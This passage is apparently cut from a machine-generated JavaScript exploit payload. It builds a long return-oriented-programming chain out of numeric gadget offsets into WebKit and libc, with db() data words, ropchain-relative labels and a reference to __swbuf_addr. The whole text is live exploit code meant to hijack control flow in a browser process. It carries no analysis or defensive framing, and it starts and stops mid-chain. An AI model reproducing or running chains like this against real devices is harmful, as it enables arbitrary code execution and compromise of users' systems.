webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+136904, //L1839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1839:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1840:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L1841:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1842:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+137024, //L1843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1843:
db([0, 0]); // 0x0
//L1736:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+137152, //L1846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137168, //L1847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+137136, //L1845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1845:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1846:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1847:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+137280, //L1849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137328, //L1852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+137296, //L1850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1849:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1850:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1851:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1852:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+137440, //L1853+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+137432, //L1853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L1853:
db([0, 0]); // 0x0
set_gadgets([
ropchain+137456, //L1853+24
ropchain+139800, //L1848
libc_base+764760, //pop rsi
ropchain+137496, //L1854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1854:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1856:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+137616, //L1859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+137600, //L1857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1857:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1859:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+137792, //L1862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137808, //L1863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+137760, //L1860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+137776, //L1861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1860:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1861:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1862:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1863:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+137888, //L1864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+137904, //L1865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1864:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1865:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+138064, //L1869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+138032, //L1867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+138048, //L1868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1866:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L1867:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1868:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+138168, //L1871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+138152, //L1870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1870:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1871:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+138248, //L1872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1872:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1874:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+138368, //L1877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+138352, //L1875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1875:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1877:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+138448, //L1878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+138464, //L1879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1878:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1879:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+138608, //L1882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+138576, //L1880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+138592, //L1881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1880:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1881:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1882:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+138696, //L1884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L1883:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L1884:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+138784, //L1885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1885:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1887:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+138904, //L1890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+138888, //L1888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1888:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1890:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+138992, //L1891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+139008, //L1893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+139064, //L1894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1894:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139184, //L1897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1897:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+139240, //L1898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1898:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139384, //L1902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+139368, //L1901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1900:
db([56, 0]); // 0x38
set_gadget(webkit_base+3236123,); //pop r9
//L1901:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1902:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+139504, //L1903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+139536, //L1905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+139520, //L1904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1903:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1904:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1905:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139640, //L1906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+139656, //L1907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1906:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1907:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+139776, //L1908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+139760, //L1909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1909:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1908:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+141248, //L1910
//L1848:
libc_base+764760, //pop rsi
ropchain+139840, //L1911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1911:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1913:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+139960, //L1916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+139944, //L1914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1914:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1916:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+140104, //L1919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140072, //L1917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+140088, //L1918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1917:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1918:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1919:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+140184, //L1920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1920:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1922:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+140304, //L1925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140288, //L1923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1923:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1925:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+140480, //L1928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+140496, //L1929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140448, //L1926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+140464, //L1927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1926:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1927:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1928:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1929:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+140592, //L1931
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+140576, //L1930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1930:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1931:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L1933:
ropchain+140696, //L1932
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+141576, //L1934
//L1932:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+140840, //L1936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+140856, //L1937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+140824, //L1935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L1935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1936:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1937:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+140968, //L1938
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141000, //L1940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+140984, //L1939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1938:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1939:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1940:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141104, //L1941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141120, //L1942
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1941:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1942:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141240, //L1943
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141224, //L1944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1944:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1943:
db([0, 0]); // 0x0
//L1910:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+141328, //L1946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+141312, //L1945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1945:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1946:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141432, //L1947
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141448, //L1948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1947:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1948:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+141568, //L1949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+141552, //L1950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1950:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1949:
db([0, 0]); // 0x0
//L1934:
set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
libc_base+763368, //pop rcx
__swbuf_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
